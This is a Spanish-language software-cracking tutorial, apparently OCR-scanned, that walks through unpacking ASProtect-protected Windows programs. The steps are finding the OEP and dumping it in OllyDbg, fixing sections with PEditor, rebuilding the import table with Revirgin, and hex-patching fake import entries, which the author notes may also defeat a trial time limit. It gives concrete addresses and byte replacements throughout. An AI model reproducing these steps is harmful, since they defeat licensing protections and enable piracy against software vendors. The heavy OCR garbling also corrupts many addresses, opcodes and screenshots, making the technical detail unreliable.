Abrimos el Peditor, vamos a sections y damos al botón derecho del ratón y a 
dumpfixer (RS=VS y RO=V0O), entonces ya tenemos el archivo reparado, y 
hasta veremos el icono del programa, jeje la cosa se anima: 

Queda al final de: 


| PEditor 1.71 by goda 1 MOD a Nr — alcjx 
[tcouro CWINDOWSWE sertono proyecto aspecteciimenmdiampman exe - 19 f 


Enty Por JUDOO1O0O | | Machine Type forac ger 
Image Base fonn0o0o Nuerber ol Section focos ' 


A ESE pr 


Oplional Header OS 
Bare al Code [anooromo Pointer to Symbol Table: [0000000 ET 
San ell Goran | Seal Optional Header foceo cen 
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Section Algrmene [IAO alo EA 
A ro 
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31 copy the vechon to HD 
Hold your mouse on a edi box lor more infos... (e 0 Pan O 


copy a techon hom HD to EDF 
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Bueno bueno que el programa aún no funciona, necesitamos reparar la famosa 
IAT (Tabla de importaciones del programa) ya que el magnifico Asprotect la 
destroza y la carga en ejecución, pero ahora ya no disponemos de Asprotect 
para que nos haga el trabajo. 


En fin con el programa en perfecto funcionamiento ya, abrimos el Revirgin 
(qué fantastica herramienta) y seleccionamos el proceso: 


2 Reviogmn by +Trehp 1.3 pubbe version 


migav El exe FFFFIFA3 00000000 00000000 
pera exo FEFFEZF 00007000 00500000 
vemon eve FFFFI507 O0O7AD00 00400000 
mndog exe FFFFC273 00007000 00400000 
mentashk tk FFFE4B08 00000000 00000000 
escicre exa FFFEEEF3 00020000 00400000 
taskmon exe FFF11543 00007000 00400000 
yitray eso FFF160 78 00008000 00400000 
helemp exe FFFISEFF 00010000 00400000 
borra ene FFFIAALI 00000000 00400000 
penon ens FFF1B087 00010000 00400000 
MAR rm FFETEFIB 00006000 00400000 
loadan exe FFFOZBA3 00004000 01000000 
nar e FFFOOSA 7 00000000 00000000 
marrags exe FFF10E888 00168000 00400000 
2onealam et FFFEO287 00004000 00400000 
ddelp exe FFFODF93 00000000 01 000000 
cricem es FFF30106 00024000 00400000 
veneno exo FFF37167 00004000 01000000 
verewcid. ens FFF25558 00636000 30000000 
poci22 exe FEFAIFB 00008000 00400000 
merma es FFFSSAAF 00010000 01 000000 
patores ema FFF49447 00017000 01000000 


phatorro ee FEFGOFDF 0061 8000 00400000 

aliydbg exe FFF7FED3 O00F 7000 00400000 

venarp ee FFFIJE 77 00081000 00400000 

manager. exe FFFEZDE 3 DO1DE 000 00400000 
x exo FEFZE E 08 0071€ 000 00400000 


Nos saldrá esto: 


Error 
Image Import Descriptor corrupted, enter the DEP and click Fetchl4T. 


[Aceptar 


Eso claro está es porque no tiene la IAT. 


Bueno pues en OEP le metemos el OEP nuestro y damos en Fetch IAT, luego 
al botón IAT resolver y tenemos lo siguiente (nunca os fiéis de sus datos, se 
debería comprobar aunque a veces salta a la vista que está mal porque sólo 
saca funciones de kernel32 por ejemplo, para comprobar leeros los magníficos 
tutoriales de Ricardo Narvaja, por ejemplo cursos 33 a 39 y el nuevo tutorial 
para Ad Search 4 Replace): 


A Revugin by +Tsehp 1.3 public version Pla] E | 
manager exe FFF2097F 001D£ 000 00400000 w| Refresh 


Select Mode to Altach > 


Mode [Oidnal [Neme ladies lATAvo [Beta 
—— [ODDODOOO. | rdeectodema BFFBABFA. [0O0O6158 
00000000 tedrected/emo 


00000000  tedrecied/er BFF7B982 '0DOD615T 


AT Crlical Values o 

DEP 00441 4ac . 

CN A 7 Ava | 
Length [00000730 +. Length [0000015 


E ShowlAT refers [oannDEDO a A 


V Autofix sections + IT paste 
TF Mangled Schema high limit [10000000 
toa] 
manager exe ¡Resolved import: View Import Edt ásabled Y 


Pulsamos en Resolve Again y ya tenemos: 


A Revugin by +Tsehp 1.3 public version 1 [al E | 
manager exe FFF2097F 001D£ 0009 00400000 w| Relresh 


| Stop | 
coc _— ia aa 
va [oonsrs _recnr y Lemeaaal PA | — 
Len [o00o7sc Losdresolvod]| y amorr [00000280 
Save tesolved] 


7 ShowiAT receso — [EDOODT py [frenar ——— y] 


V Autofix sections + IT paste 


FT Mangled Schema hi limit [10000000 
2 _ fo | 


¡manager exe ¡Resolved imports View Import Edit ásobled Y 


EL MEROS HATE A | DA 


Abos | 


manage! exe - Resolved import: View Import Edt ás otled 


Como veis tiene muy buena pinta, pero se puede observar que hay entradas sin 
resolver, ese el quit de la cuestion en Asprotect, que debemos saber que son y 
repararlas si es posible, teneiendo en cuenta que hay entradas falsas, que es lo 
que nos ha estado intrigando a todos desde hace tiempo, y que están puestas 
para engañarnos. Jeje 


Nada pues pulsamos en Show All y lo ponemos a Show Unresolved, para que 
nos saque las que no ha cogido: 


A Revirgin by +Tsehp 1.3 public version 


manager exe FFF2097F 001DE 000 00400000 
Select Module to Altach 


O 91271380 OO005ICO 
MI PUES 


ds =— ra [od q 

AVA — [00006155 _Fetchlar | ¿AE RVA EE > 
pi | — | 

F ShowlAT eferers — JODODOOTE race, - 


[Y Autofix sechons + 1T paste 


TF Mangled Scheme hiah limi [10000000 
E _tbot | 
¡manager exe Resolved imports View Import Edi disabled Ys 


Estas son las que no ha reparado, bueno aquí ya se ha escrito algo, pero creo 
que se va a escribir mucho ya que parece que trabaja casi siempre de la misma 
manera, y es un poco cuestión de práctica detectar cuales son falsas y cuales 


no. 


Yo en principio lo que suelo hacer es enumerarlas según las comunes así: 


(1) 1270EFC D61A8 
(2) 1270EFC D6368 

(3) 1271350 D61AC 

(4) 1271350 D625C 

(5) 1271350 D6374 

(6) 12713B0 D6ICO 

(7) 12713C8 D6310 

(8) 127136C D6354 

(9) 12713A4 D639C 

(10) 1271390  D63A0 

(11) 12713D8 D63AC 


Normalmente para las del mismo grupo pongo la misma API. 

QUIÉN ENGAÑA A QUIÉN ! 

Vallamos a Olly, una vez que estamos en el OEP, con Crtl+G vamos a esas 
direcciones, incluso si queremos ver que hace cuando pasa con F2 ponemos 


un Break Point. 


Veamos el código en detalle (por cierto esto sólo se halla en Asprotect y no en 
nuestro volcado, ojito que deberemos saber que es): 


Entrada 1 y 2: 


01270EFC 55 PUSH EBP 


01270EFD 8BEC 
01270EFF 8B55 0C 
01270F02 8B45 08 
01270F05 8B0D 3C542701 
DS:[127543C] 

01270F0B 8B09 
01270F0D 3BC8 
01270FOF 75 09 

01270F11 8B0495 50532701 
DS:[EDX*4+1275350] 
01270F18 EB 07 
01270F1A 52 

01270F1B 50 

01270F1C ES 3F42FFFF 
01270F21 5D 

01270F22 C2 0800 


MOV EBP,ESP 

MOV EDX,DWORD PTR SS:[EBP+C] 
MOV EAX,DWORD PTR SS:[EBP+8] 
MOV ECX,DWORD PTR 


MOV ECX,DWORD PTR DS:[ECX] 
CMP ECX,EAX 

JNZ SHORT 01270F1A 

MOV EAX,DWORD PTR 


JMP SHORT 01270F21 
PUSH EDX 

PUSH EAX 

CALL 01265160 

POP EBP 

RETN 8 


(Cómo me recuerda al de Search 8 Replace, sniff sniff) 


Podemos saber con todas si son entradas falsas, pues Nopearíamos la Call, 
pulsando la barra espaciadora sobre dicho comando a ejecutar y poniendo 


Nop, quedando así 


01270EFC 55 

01270EFD 8BEC 
01270EFF 8B55 0C 
01270F02 8B45 08 
01270F05 8B0D 3C542701 
DS:[127543C] 

01270F0B 8B09 
01270F0D 3BC8 
01270FOF 75 09 

01270F11 8B0495 50532701 
DS:[EDX*4+1275350] 
01270F18 EB 07 
01270F1A 52 

01270F1B 50 


PUSH EBP 

MOV EBP,ESP 

MOV EDX,DWORD PTR SS:[EBP+C] 
MOV EAX,DWORD PTR SS:[EBP+8] 
MOV ECX,DWORD PTR 


MOV ECX,DWORD PTR DS:[ECX] 
CMP ECX,EAX 

JNZ SHORT 01270F1A 

MOV EAX,DWORD PTR 


JMP SHORT 01270F21 
PUSH EDX 
PUSH EAX 


01270FIC 90 NOP 


01270F1D 90 NOP 
01270F1E 90 NOP 
01270F1F 90 NOP 
01270F20 90 NOP 
01270F21 5D POP EBP 
01270F22 C2 0800 RETN 8 


S1 ejecutamos y casca es que no es falsa. Esta en concreto casca, así que no es 
mala ni falsa ni nada. 


En la parte de código hacemos Crtl+G en la dirección 1265160 y vemos lo 
siguiente: 


01265160 FF25 F8712701 JMP DWORD PTR DS:[12771E8] 
(nuevamente más asprotect xD) 

y ahora en la parte de datos hacemos otro Crtl+G a 12771F8 y vemos el valor 
de izquierda a derecha que es 012771F8 68 5E 6C 84 h“l,, o sea que 
salta a 

846C5E68 veamos qué hay allí, de nuevo Crtl+G a esa dirección en la ventana 
de código, y hay lo siguiente: 


846C5E68 68 AS6DF7BF — PUSH KERNEL32.GetProcAddress 
846C5E6D E9 58F98C3B JMP KERNEL32.BFF957CA 


O sea que llama a la API GetProcAddress en BFF76DAS (fijaos en el de 
arriba está al revés), pues al revirgin con ello y para estas entradas en concreto 
la 1 y la 2, con el botón derecho ponemos Edit Mode, y en la parte Module 
ponemos Kernel32.dll, en name ponemos GetProcAddress y en Address 
metemos la de esta API, BFF76DAS. Es decir las entradas 1 y 2 la resolvemos 
así. 


NOTA: Para los usuarios de Softlce es más fácil ya que con hacer u 1270EFC 
en la dirección de la llamada, ya se ve a quién va, y para saber la dirección de 

la API con poner u kernel32!GetProcAddress también lo vemos. Abrá formas 

mejores, lo se yo aún soy un novato estoy aprendiendo como vosotros. 


Bueno la 1 y la 2 están, veamos el código para la 3,4, y 5: 


Entradas 3, 4 y 5: 


01271350 55 

01271351 8BEC 
01271353 8B45 08 
SS:[EBP+8] 

01271356 85C0 
01271358 75 07 
01271354 Al 78692701 
DS:[1276978] 
0127135F EB 06 
01271361 50 

01271362 ES F13DFFFF 
01271367 5D 
01271368 C2 0400 


Hacemos lo mismo, Crtl+G en código y da: 


01265158 FF25 FC712701 


PUSH EBP 
MOV EBP,ESP 
MOV EAX,DWORD PTR 


TEST EAX,EAX 
JNZ SHORT 01271361 
MOV EAX,DWORD PTR 


JMP SHORT 01271367 
PUSH EAX 

CALL 01265158 

POP EBP 

RETN 4 


JMP DWORD PTR DS:[12771FC] 


de nuevo Crtl+G en Datos sobre 12771FC y vemos esto: 


012771FC 78 5E 6C 84 


XAl,,, es decir 846C5E78 


Crtl+G en 846C5E78 en la parte de código y tenemos: 


846C5E78 68 1677F7BF 


846C5E7D E9 48F98C3B 


PUSH KERNEL32.GetModuleHandleA 
JMP KERNEL32.BFF957CA 


Ya sabemos lo que hay que hacer no?, pues para la 3,4,5 tenemos 


Module= Kernel32.dll 


Name= GetModuleHandleA 


Address= BFF77716 


Resolve Again y listas ya están. Por cierto tampoco son falsas. 


Entrada 6: (YA INTENTAN ENGAÑARNOS xD) 

Venga venga que aún queda: vayamos a la 6 está es en 12713B0, tenemos lo 
siguiente: 

Aquí vienen las falsedades de asprotect, y existen dos formas de resolverlo: 


012713B0 6A 00 PUSH 0 

012713B2 ES A13DFFEFF CALL 01265158 

012713B7 FF35 ES6C2701 PUSH DWORD PTR DS:[1276CE3] 
012713BD 58 POP EAX 

012713BE 8B05 F86C2701 MOV EAX,DWORD PTR 
DS:[1276CF8] 

012713C4 C3 RETN 


Esa call es la misma que en el anterior si os fijais, es decir 
GetModuleHandleA, pero esperad no corrais aún, si pusisteis un BreakPoint 
alli, como veis mete en la pila el valor de la posición de memoria 1276CES8, y 
luego se lo devuelve a EAX , pero luego vuelve a cambiar EAX, con lo que 
esas dos instrucciones no valen para nada, sin enbargo hace que eax, valga lo 
de 1276CF8. 


Bueno ejecutad hasta que pare en el Break Point, vereis que por ejemplo a 
EAX se le pasa el valor 819C61C0 en mi caso y durante esta ejecución 
también vale lo mismo, pues reiniciad el programa con Olly de nuevo vereis 
otro valor parecido eso si pero no igual, incluso en vuestras máquinas puede 
ser diferente, AQUÍ es donde viene el tema. 

De hecho imaginad que parcheo esa entrada de manera que me ponga EAX 
con ese valor, me puede funcionar a mi, pero a vosotros no. 


RECEMOS 


Algún tiempo estuvo presente en las oraciones de alguno ;-). 

Resulta que investigando un poquito el mismo código de Asprotect, en la 
dirección 1276CF8 guarda los resultados de GetCommandLineA, y lo hace de 
forma algo curiosa, en algún momento de su código hace un CALL EAX, y va 
a GetCommandLineA, y luego hace algún push, un ¡mp y luego un RET, y 
atención porque antes de ese RET el código estaba oculto, hace el ret y 
aparece delante nuestro un MOV[EBX-0A],EAX, casualmente para 
GetCommandLineA ese EBX-0A cae en 1276CF8, ese EAX, vale un 
numerito parecido al de arriba ese famoso 819C61C0. 


Bueno después de esta paranoia mental, perdónenme soy novato y quiero 
enseñarles todo, las soluciones son o bién: 


e Resolver la entrada 6 como GetCommandLineA en la dirección 
BFFSCI5DA 
e O bién en la llamada a esta entrada parchear por: 
e MOV EAX, dir del OEP 
e RETN 


Como prefirais funciona de los dos modos, pero personalmente resulta más 
cómodo el GetCommandLineA, ya que no hay que parchear. 


Venga a por la 7 (MAS ENGAÑOS NO POR DIOS), su código es: 


012713C8 55 PUSH EBP 

012713C9 8BEC MOV EBP,ESP 

012713CB 8B05 F386C2701 MOV EAX,DWORD PTR DS:[1276CF8] 
012713D1 8B453 08 MOV EAX,DWORD PTR SS:[EBP+38] 
012713D4 5D POP EBP 

012713D5 C2 0400 RETN 4 


Esta es falsa, ya que parcheando esta llamada por un retn4 el programa 
funciona igual, así que estaba puesta para despistar. 

Para parchear necesitamos el offset donde está esta llamada. Los cambios fijos 
siempre se deben hacer en un editor hexadecimal, yo uso por ejemplo 


HexWorkShop. 
Para saber este offset: 


e Con Olly, vamos con Crtl+G en el código a 4D6310, luego allí botón 
derecho y poner Find Referenced To, y luego selected command, o tb 
Crtl.+R, nos sale lo siguiente : 

References in MANAGER: to 004D6310 


Address Disassembly Comment 
00406444 JMP DWORD PTR DS:[4D6310] 

004D6310 ENTER 2713,1 (Initial CPU 
selection) 


e En HexWorkShop con Crtl+F, buscamos los valores hexadecimales 
correspondientes a FF2510634D (la misma dir. De 4d6310, pero al 
revés) 

Se va a la offset 406A44 


En fin para saber que bytes debemos cambiar vamos a Olly y hacemos en la 
ventana de código Crtl+G 406444, o en la anterior pulsando dos veces con el 
ratón sobre la linea que resalta 406444, bién estamos ya en 


00406A44 FF25 10634D00  JMP DWORD PTR DS:[4D6310] 
Pulsamos barra espaciadora y metemos un RETN 4, y vemos que ha cambiado 


a: 
00406444 C2 0400 RETN 4 


00406447 90 NOP 
00406448 90 NOP 
00406449 90 NOP 


Así que se debe cambiar FF2510634D00 por C20400909090, pues nada 
abrimos el HexWorkShop y hacemos Crtl+G ponemos el offset anterior 6444 
y cambiamos allí, grabamos el archivo y parcheado. 


Entrada $ (HA Y QUE SER MAS LISTO QUE EL HAMBRE). Su código 


es: 


0127136C 6A 00 PUSH 0 

0127136E Es ES3DFFEFF CALL 01265158 

01271373 FF35 ES6C2701 PUSH DWORD PTR DS:[1276CE3] 
01271379 58 POP EAX 

01271374 C3 RETN 


En principio intenta confundirnos con un GetModuleHandleA ya visto antes, 
pero vemos que mete en EAX, el valor de 1276CE8 que es COO00A04, que 
para mi nunca cambia, y que como en la entrada 6, ya que hace lo mismo se 
trata de GetVersion. 

Pues nada al Revirgin y en esta entrada poner: 

Con esta API me funciona, aunque aquí probé a meterle un RETN y el 
programa cascó. 


Module: Kernel32.dll 
Name: GetVersion 
Address: BFF92F1B 


Resolve Again y reparada. 

Entrada 9 (MENTIRIJILLAS YA): 

Bueno el código que es este: 

012713A4 Es C73IDFFFF CALL 01265170 

012713A9 Al F46C2701 MOV EAX,DWORD PTR DS:[1276CF4] 
012713AE C3 RETN 

En principio intenta engañarnos con un GetVersion y luego pone en EAX el 
valor FFF78C43, que dada la experiencia tomo ya la determinación que 


cuando EAX toma un valor así parcheo la entrada y me curo en salud. 


Entonces lo mismo que para la 7, buscamos es offset y este es 40692C y 
sustituimos 


0040692C FF23 9C634D00  JMP DWORD PTR DS:[4D639C], por 
0040692C C3 RETN 


0040692D 90 NOP 

0040692E 90 NOP 

0040692F 90 NOP 

00406930 90 NOP 

00406931 90 NOP (Nota: también se puede hacer por RETn 4) 
Entrada 10: 


0127139C Al EC6C2701 MOV EAX,DWORD PTR DS:[1276CEC] 
012713A1 C3 RETN 


Se ve claro, EAX toma FF FF FF 7F yyy+, huele a falsísimo 
Ya sabemos sustituir 00406924 FF25 A0634D00 JMP DWORD PTR 
DS:[4D63A0] 

Por RETN del mismo modo. 


Y por último entrada 11: 


012713D8 55 PUSH EBP 
012713D9 8BEC MOV EBP,ESP 
012713DB 5D POP EBP 
012713DC C2 0400 RETN 4 


Opinen por ustedes, megafalsa (lo podría decir hasta Leticia xxxD) 


Lo mismo sustituir 
0040690C FF25 AC634D00 JMP DWORD PTR DS:[4D63AC] 
por RETn 4 


En fin con todo esto el programa debería estar solucionado a falta de saber si 


hace alguna llamada del tipo call[pos de mem.] donde pos. de mem. almacena 
algún código Asprotect como sucedía en el Ad Search € Replace. 


RECAPITULACIÓN 


1270EFC GetProcAddress BFF76DAS 
1271350 GetModuleHandleA BFF77716 
12713B0 GetCommandLineA BFFSCS5DA 
127136C GetVersion BFF92F1B 


Falsas 12713c8 en 406444 poner un RETN 4 
12713A4 en 40692C poner un RETN 
127139C en 406924 poner un RETN 
12713D8 en 40690C poner un RETN4 


Con esto el programa funcionará perfectamente, y quizá la limitación por 
tiempo está muerta, pero pueden existir otras complicaciones que deben ser 
tocadas, yo me he limitado a hacer el tutorial para descomprimir con Olly. 


NOTA para el SICE: 

Para aquellos que querais hacerlo con SICE es fácil, se debe tener cargado el 
Ice Dump, y con la utilidad Superbpm activada y la opción Monitor, se 
pondría un bpx GetVersion, y cuando pare la segunda vez con F12, y ya en el 
código Asprotect, quitar los bpx con BC* y colocar un bpm 4D14AC RW, 
ejecutar, cerrar el programa volver a ejecutarlo y parará en el OEP, momento 
en el cual volcar con Ice, cuyo comando sería /dump 400000 1DE000 
directoriolarchivo.exe. Por lo demás seguir los mismos pasos 
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Ñ ograma Advanced Admininistrative Tools v5.10(Build 867) 


PROTECCION: ON: Asprotect 1.23 más que suficiente... 1.23 más que Asprotect 1.23 más que suficiente... 
Descripcion: Programa muy bueno que te permite ver y hacer un montón de cosas 
de administración. 
Dificultad: Dificultad: Algo avanzadillo ami parecer... Algo avanzadillo a mi parecer... a mi parecer 


DOWNLOAD: http://www. glocksoft. com 


Peid v0.8, OllyDbg v1.07b, Hex Workshop, Memory Dumper, PEditor, 
Revirgin, Import Reconstructor y sobre todo mucha paciencia para no 
Herramientas: darle un puñetazo al display; ahh y muy importante los tutoriales de 
Ricardo, de Auspex y de DGrojo sobre el tema, muy buenos y una 
lectura más que recomendada 


CRACKER: Cubafreak FECHA: 05/10/2002 


Introducción: Vaya pedazo de programa este, comprimido con el maldito y ya domado ASprotect, 
me tuvo alrededor de un mes dándome fuertes dolores de cabeza. Para entender más este tute léanse 
los ya antes mencionados de Ricardo, Auspex y DGrojo, pues en esencia es muy parecido a lo que 
vamos a hacer salvo “algunas” trampillas extras que me tendió el ASprotect que no lo vi ni en el 
Aniconta, ni en el RAM IDLE 2.02, ni en los otros. 


Al atakeeeee: 


Pues lo primero es lo primero, con el Peid vemos que efectivamente esta comprimido con el 
ASprotect 1.23 


¿PEiDentifier v0.8 


Entry Point ; 


1.) OEPFound-6A8Añ8 


File Offset : 


Linker Version : 


Information ; 


|ASProtect 1.2x [New Strain] -> Alexey Solodovnikow 
 Stay-On-Top Menu 


El OEP encontrado por el Peid es verdadero, pero de todas formas lo vamos a hallar con el fabuloso 
método de las excepciones de Ricardo. Aquí lo copio textualmente del tutorial de DGrojo del RAM 
IDLE 2.02, espero que no se ponga bravo. 


“Este método consiste en introducir el programa el el Olly y ejecutarlo con F9 donde se irán 
generando unas excepciones en el transcurso del programa (por lo menos 20 o así), que iremos 
superando con Shift+F7 y F9 de nuevo, y que llegados a la última al pulsar F9 se ejecutará el 
programa (...)” bueno para este programa son alrededor de 27 y al 28 se ejecuta el programa (puede 
variar). 

“(...) conviene tener anotados el tamaño de la imagen y el largo (como datos para el volcado de 
memoria al disco), además de conocer cual es la sección de código donde cae el OEP, aunque para 
poner el Break Point On Memory Access en su sección con Olly claramente aparece en la parte 
Contains en la etiqueta Code de la ventana Memory Map, que hacemos aparecer con Alt+M (...)” y 
entonces “(...) ponemos un Break Point On Memory Access, en la sección de ejecución del programa, 
damos Shift+F7 y F9 y Eureka!, estamos en el OEP, que vemos coincide con el que mostró PEID.” 


Ahora que estamos en el Entry Point toca volcar el programa, se usa el Memory Dumper pq el 
ProcDump y el LordPe dan problemas (ver tutoriales antes mencionados para mayor referencia). 
Tampoco voy a explicar el uso del Memory Dumper pues tambien estan explicados en dichos 
tutoriales. 


Ya dumpeado el programa toca arreglar con el PEditor el OEP-6ASAAS y que el tamaño en disco del 
programa sea igual al tamaño virtual cosa que hacemos con la opción dumpfixer (RS=VS y RO=VO) 
del PEditor una vez estando en sections. Ya se puede ver que aparece el iconito del programa. 


Ahora hay que reparar la ya tan conocida IAT cosa que hacemos con Revirgin y bueno yo tambien 
utilicé el Import Reconstructor pq el Revirgin se me bloquea cada vez que le doy Fetch IAT para 
hallar donde comienza el RVA y su largo. Los valores que me da el Import Reconstructor son 
correctos: RVA: 2B4254 Size: B20, los pongo en el Revirgen, pongo el entry point: 002a8aas (en 
Offset) y le doy a IAT Resolver y luego a resolve again para que solo me queden las entradas que el 
revirgin no pudo resolver. 


Quedaría así: 


q Revirgin by +Tsehp 1.5 public version E (0 
aatools.exe 00000414 003C8000 00400000 


EE Ta E E 


OOOO OMEESES (00284354 


O ONES 


A O A 


A O E 
RR IOMIEESES 002844DO 


€ 00284514 


1AT Critical Valu 
DEP 002a8aas 


AT Resolver >= IT Vales E generator 
| Resol RVA. | 
RYA [284254 Fetch l4T asa generate! | 
Eos [620 Losa resolved Length [00000410 
: - Save tesolved] 


[Y ShowlAT referers fbo0o001 0 Tracer | [Show Unresolved +] 


[Y Autofix sections +|T paste 
T” Mangled Scheme — high limit [10000000 


About 


En total son diez entradas sin resolver, que nos toca hacerlas a mano con el Olly. 


Para resolverlas buscamos en el Olly las direcciones que se ven en la figura (en Address) con Ctrl.+G, 
por ejemplo para la primera 011EE494 vemos el siguiente código: 


011EE494 55 PUSH EBP 

011EE495 8BEC MOV EBP,ESP 

011EE497 8B55 0C MOV EDX,[DWORD SS:EBP+C] 
011EE49A 8B45 08 MOV EAX,[DWORD SS:EBP+38] 
011EE49D 8B0D B8541F01 MOV ECX,[DWORD DS:11F54B8] 
011EE4A3 8B09 MOV ECX,[DWORD DS:ECX] 
011EE4A5 3BC8 CMP ECX,EAX 


011EE4A7 73 09 JNZ SHORT 011EF4B2 
011EE4A9 8B0495 14531F01 MOV EAX, [DWORD DS:EDX*4+11F5314] 


011EE4B0 EB 07 JMP SHORT 011EF4B9 
011EE4B2 52 PUSH EDX 
011EE4B3 50 PUSH EAX 


011EE4B4 ES FF6BFFFF CALL 011E50B8 ; JMP to kernel32.GetProcAddress 
011EF4B9 5D POP EBP 
011EE4BA C20800 RETN 8 


Aquí se ve clarito que es GetProcAddress, para ver la dirección correcta podemos ir a 
ViewmWBEjecutable modules, buscamos Kernell32.dll que es la nuestra, después click derecho y View 
names, buscamos la api y veremos la dirección a poner en el Revirgin. 

Lo mismo para las demás. 


Al final queda: 


11ee494 KERNEL32.dll GetProcAddress TTETASFD 
1leese4 KERNEL32.dll GetModuleHandleA 77E79F93 
11ee944 KERNEL32.dll GetModuleHandleA 77E79F93 
1leese4 KERNEL32.dll GetModuleHandleA 77E79F93 
11ee954 KERNEL32.dll GetCurrentProcess 77E79C90 
11ee900 KERNEL32.dll GetModuleHandleA 77E79F93 
11ee494 KERNEL32.dll GetProcAddress TTETASFD 
1leese4 KERNEL32.dll GetModuleHandleA 77E79F93 
11ee938 KERNEL32.dll GetVersion 77E7C486 
11ee964 KERNEL32.dll GetVersion 771E7C486 


Pues bien, las ponemos en el Revirgin y le damos generate! Para salvarlas en nuestro ejecutable 
dumpeado. 


Por supuesto que este asprotect no se iba a quedar sin tratar de engañarnos con sus entradas falsas las 
cual podemos comprobar nopeando las llamadas a las apis, si no se cuelga es que la entrada era falsa. 
Las falsas son: 


01- 


011EE944 6A 00 PUSH 0 

011EE946 E8 6567FFFF CALL 011850B0 ; JMP to kernel32.GetModuleHandleA 
011EE94B FF35 14671901 PUSH[DWORD DS:1196714] 

011EE951 58 POP EAX 

011EE952 C3 RETN 


Para arreglarla buscamos donde se realiza la llamada a esta parte y ponemos como explica Ricardo en 
el tuto del Search 8 Replace: 

MOV EAX, Entry Point original (GASAAS8) 

RETN 


Sería en: 
004013A8 -FF25 C0426B00 JMP NEAR [DWORD DS:6B42C0] 


004013AE 8BCO0 MOV EAX,EAX 
02- 

011EE954 55 PUSH EBP 
011EE955 8BEC MOV EBP,ESP 


011EE957 E8 1C67FFFF CALL 01185078 ; JMP to kernel32.GetCurrentProcess 
011EE95C 8B45 08 MOV EAX, [DWORD SS:EBP+38] 

011EE95F 5D POP EBP 

011EE960 C2 0400 RETN 4 


Aquí es poner RETN 4 en: 
00407A58 -FF25 30446B00 JMP NEAR [DWORD DS:6B4430] 


03- 


011EE900 6A 00 PUSH 0 

011EE902 E8 A967FFFF CALL 011850B0 ; JMP to kernel32.GetModuleHandleA 
011EE907 FF35 04671901 PUSH[DWORD DS:1196704] 

011EE90D 58 POP EAX 

011EE90E C3 RETN 


Aquí ponemos lo mismo que en la 1ra entrada falsa, en: 
00407990 -FF25 8C446B00 JMP NEAR [DWORD DS:6B448C] 


04- 

011EE938 E8 9367FFFF CALL 011850DO ; JMP to kernel32.GetVersion 
011EE93D Al 10671901 MOV EAX. [DWORD DS:1196710] 

011EE942 C3 RETN 


Aquí lo que toca es RETN en: 
00407870 -FF25 14456B00  JMP NEAR [DWORD DS:6B4514] 


05- 
011EE964 55 PUSH EBP 
011EE965 8BEC MOV EBP,ESP 


011EE967 E8 6467FFFF  — CALL 011850DO ; JMP to kernel32.GetVersion 
011EE96C 5D POP EBP 
011EE96D C2 0400 RETN 4 


Y por último esta se arregla con un RETN4 en: 
00407848 -FF25 28456B00 JMP NEAR [DWORD DS5S:6B4528] 


Todos estos arreglos los hacemos con un editor Exadecimal en el ejecutable dumpeado. 


Pero no podemos confiarnos demasiado que con esto quedaría listo, ya veremos las trampillas que nos 
puso el muy HP. 


Si ejecutamos el programa vemos que no sale absolutamente nada, entonces se nos ocurre tracearlo un 
poco para ver que encontramos, 


Para empezar vemos un Call a lo que parece una dirección del ASprotect ( 01A7E8CC) por lo que 
debemos de buscar en el ejecutable original los valores reales para cambiarlos. 


DOllyDbg - aatols-Dump.exe 


File View Petug Plugins Options Window Help 


MOU EBP,ESP 

ADD ESP,-10 
B3 3681600 MOU EAX, aatols-D. 006481835 
ES EBEADSFF CALL_aatols-D. 00407598 
Al 4CFD6AGO MOU EAX, COWORD DS: 6AFD4C] 
3B00 MOU EAX, COWORD DS: ERx<] 

Es COBFOCFF CALL _aatols-D.00474A34 
—FF1S E4FS6AG0-— (CALL NEAR CDWORD DS: 64FSE4] 
A1 4CFD6AGO MOU EAX, COWORD OS: 6AFD4CI 
3800 MOU EAX, COWORD 0S:EAx] 
ES 46CODCFF CALL aatols-D.00474B1C 
ss 99CODSFF e aatols-D. 00404B74 


[BYTE DS:EAx],AL 
[BYTE DS:EAXxJ],AL 
[BYTE DS:EAXx], AL 
[BYTE DS:EAxX],AL 
[BYTE DS:EAXx], AL 
[BYTE DS:EAXx],AL 
[BYTE DS:EAx],AL 
[BYTE DS:EAXJ,AL 
[BYTE DS:EAx],AL 
[BYTE DS:EAXJ, AL 
[BYTE DS:EAXx], AL 
[BYTE DS:EAxX],AL 
[BYTE DS:EAXx], AL 
[BYTE DS:EAXx], AL 
[BYTE DS:EAXx],AL 
[BYTE DS:EAXJ, AL 
(BYTE DS:EAX], AL 

[BYTE DS:EAXJ, AL 
[BYTE DS:EAX],AL 
[BYTE DS:EAx],AL 
[BYTE DS:EAXx], AL 
[BYTE DS:EAx],AL 
[BYTE DS:EAX],AL 
[BYTE DS:EAXx],AL 
[BYTE DS:EAx],AL 
[BYTE DS:EAXJ, AL 
[BYTE DS:EAX], AL 
[BYTE DS:EAX], AL 
[BYTE DS:EAx], AL 
[BYTE DS:EAx],AL 
[BYTE nas EAX], AL 


En el programa original lo que tenemos es lo siguiente: 


006ABAC4 .FF15 E4F56A00 CALL NEAR [DWORD DS:6AF5F4] 
donde en 6AF5F4] está 0118E8CC 


0118E8CC 833D 6C661901 00 CMP [DWORD DS:119666C],0 


0118E8D3 74 06 JE SHORT 0118E8DB 
0118E8D5 FF15 6C661901 CALL NEAR [DWORD DS:119666C] ; AAtools.006A8020 
0118E8DB C3 RETN 


Al final la verdadera llamada es a 006A8020 
Por lo que aprovechamos la cantidad de 0000000000. ... Que hay abajo para agregar un pequeño 
código que resolverá nuestro problema. 


Antes: 

006ABAC4 FF15 E4F56A00 CALL NEAR [DWORD DS:6AF5HF4] 
OO6GABACA Al 4CFD6AOO MOV EAX,[DWORD DS:6AFD4C] 
00O6ABACF 8B00 MOV EAX,[DWORD DS:EAX] 
006ABADI ES 46CODCFF — CALL aatols-D.00474B1C 
006ABAD6 ES 99ICODIFF CALL aatols-D.00404B74 


O06ASADB 90 NOP 

O006ASBSADC 0000 ADD [BYTE DS:EAX], AL 
O006ASADE 0000 ADD [BYTE DS:EAX], AL 
006ASAEO 0000 ADD [BYTE DS:EAX],AL 

Después: 

006ASAC4 ES 13000000 CALL aatols-D.OD06ABADC 
006ASACO 90 NOP 

O06GASACA Al 4CFD6AOO MOV EAX,[DWORD DS:6AFD4C] 
O006ASACF 8B00 MOV EAX,[DWORD DS:EAX] 


006ASAD1 ES 46CODCFF  — CALL aatols-D.00474B1C 
006ASAD6 ES 9ICODÍFF — CALL aatols-D.00404B74 


O006ASADB 90 NOP 
O006ABADC E8 3FFSFFFF  — CALL aatols-D.006A8020 
